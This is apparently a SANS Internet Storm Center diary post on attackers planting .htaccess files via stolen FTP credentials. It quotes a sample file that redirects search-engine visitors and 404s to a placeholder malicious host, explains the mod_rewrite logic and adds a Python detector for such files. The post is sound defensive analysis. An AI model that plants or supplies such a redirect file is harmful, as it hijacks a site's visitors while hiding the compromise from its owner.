SANS Internet Storm Center; Cooperative Network Security Community - Internet Security - isc

In this latest wave of attacks, the attackers abuse the RewriteEngine feature of the Apache web server (mod_rewrite). The feature can be enabled from a per-directory .htaccess access control file, which Apache honours wherever the server configuration's AllowOverride setting permits it. The file is usually placed in the document root of the site, and in the incidents detected so far it appears to have been uploaded using stolen FTP credentials.
One sample .htaccess file is shown below:

RewriteEngine On
# Compare the Referer header (case-insensitive) with common search-engine names;
# each [OR] joins the condition with the next one, the last condition ends the chain
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
# If any condition matched: external redirect (R) and stop processing rules (L)
RewriteRule .* http://BAD_SITE/in.html?s=hg [R,L]
# A full URL here makes Apache redirect every 404 to the attacker's page as well
ErrorDocument 404 http://BAD_SITE/in.html?s=hg_err

Such a .htaccess file first enables the RewriteEngine and then defines six conditions (RewriteCond), followed by a RewriteRule. Each condition takes the Referer header (%{HTTP_REFERER}) and compares it with the regular expression that follows. As you can see, the attackers are catching the most common search engines. For those not familiar with rewrite rules: NC means no case (case-insensitive matching), and OR joins the condition with the next one as a logical OR; the last condition carries no OR, which ends the chain. If any of the conditions matches, the RewriteRule is applied. In this sample it redirects the browser to the bad site ([R,L] in the RewriteRule means force an external redirect, last rule). The ErrorDocument line does the same for any request that produces a 404: because its argument is a full URL, Apache answers with a redirect to the attacker's page instead of serving a local error page. Note what the referer check buys the attacker: only visitors arriving from a search engine are redirected, so the site owner who types the address directly sees a normal site and may not notice the compromise. Note also that the patterns are not anchored to a host name, so a referer such as http://www.example.com/tasks matches .*ask.*$ too. If you run a web site, look through its directories for .htaccess files you did not create, compare any legitimate one against a known-good copy, and, given how these files got there, review the FTP logs and change the FTP credentials.
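To make the condition chain and the detection concrete, here is an added example (my own code, not part of the ISC diary) that parses the three directives this attack relies on, evaluates the RewriteCond/RewriteRule chain for a given Referer the way mod_rewrite does, and flags the traits a site owner would want to catch: a referer-conditioned redirect to another host and an ErrorDocument pointing off-site. The sample .htaccess is the one quoted above with BAD_SITE kept as a placeholder, the site host name www.victim.example is hypothetical, and the evaluator is a simplification (only HTTP_REFERER is exposed, no backreferences, no per-directory prefix handling).

```python
import re
from dataclasses import dataclass
from urllib.parse import urlparse

# Constructed sample: the attacker-style .htaccess quoted above, with BAD_SITE
# left as a placeholder rather than a real host.
SAMPLE_HTACCESS = """\
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://BAD_SITE/in.html?s=hg [R,L]
ErrorDocument 404 http://BAD_SITE/in.html?s=hg_err
"""

@dataclass
class Cond:
    var: str        # e.g. %{HTTP_REFERER}
    pattern: str    # regex applied to the variable's value
    nocase: bool    # [NC]
    ornext: bool    # [OR]: OR-joined with the following condition

@dataclass
class Rule:
    conds: list     # RewriteCond lines that precede this RewriteRule
    pattern: str
    target: str
    flags: set

def _flags(token):
    """'[NC,OR]' -> {'NC', 'OR'}; a flag such as 'R=301' is reported as 'R'."""
    return {f.split("=")[0].upper() for f in token.strip("[]").split(",") if f}

def parse_htaccess(text):
    """Parse RewriteCond, RewriteRule and ErrorDocument; everything else is ignored.
    Directive names are matched case-insensitively, as Apache does."""
    rules, error_docs, pending = [], {}, []
    for raw in text.splitlines():
        parts = raw.split()
        if not parts or parts[0].startswith("#"):
            continue
        name = parts[0].lower()
        flags = _flags(parts[3]) if len(parts) > 3 else set()
        if name == "rewritecond" and len(parts) >= 3:
            pending.append(Cond(parts[1], parts[2], "NC" in flags, "OR" in flags))
        elif name == "rewriterule" and len(parts) >= 3:
            rules.append(Rule(pending, parts[1], parts[2], flags))
            pending = []        # conditions bind only to the next RewriteRule
        elif name == "errordocument" and len(parts) >= 3:
            error_docs[parts[1]] = parts[2]
    return rules, error_docs

def _cond_matches(cond, env):
    value = env.get(cond.var.strip("%{}"), "")
    return re.search(cond.pattern, value, re.IGNORECASE if cond.nocase else 0) is not None

def conds_match(conds, env):
    """mod_rewrite semantics: conditions are ANDed, except that [OR] joins a
    condition to the one after it, so an OR-run is true if any member matches."""
    groups, run = [], []
    for cond in conds:
        run.append(cond)
        if not cond.ornext:
            groups.append(run)
            run = []
    if run:                      # trailing [OR] with nothing after it
        groups.append(run)
    return all(any(_cond_matches(c, env) for c in run) for run in groups)

def redirect_for(rules, path, referer):
    """Return the URL a request would be redirected to, or None if no rule fires.
    Simplified: only HTTP_REFERER is exposed and backreferences are not expanded."""
    env = {"HTTP_REFERER": referer}
    for rule in rules:
        if conds_match(rule.conds, env) and re.search(rule.pattern, path):
            if "R" in rule.flags:
                return rule.target
            if "L" in rule.flags:
                break
    return None

def suspicious_findings(text, site_host):
    """Flag the two traits of this attack: a referer-conditioned redirect to a
    different host, and an ErrorDocument that sends visitors off-site."""
    rules, error_docs = parse_htaccess(text)
    findings = []
    for rule in rules:
        target_host = urlparse(rule.target).hostname   # None for local targets
        referer_conds = [c for c in rule.conds if "HTTP_REFERER" in c.var]
        if referer_conds and "R" in rule.flags and target_host and target_host != site_host.lower():
            findings.append(f"referer-conditioned redirect to {target_host}")
    for code, target in error_docs.items():
        host = urlparse(target).hostname
        if host and host != site_host.lower():
            findings.append(f"ErrorDocument {code} sends visitors to {host}")
    return findings
```

Running redirect_for over the sample with an empty Referer returns None (the owner's direct visit looks normal), while a Google referer, a YAHOO referer in any case, and even http://www.example.com/tasks all return the attacker's URL, the last one because of the unanchored .*ask.* pattern; suspicious_findings reports both the redirect and the ErrorDocument. Point it at every .htaccess under the document root to triage a site quickly.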

InfoSec Handlers Diary Blog - Watch that .htaccess file on your web site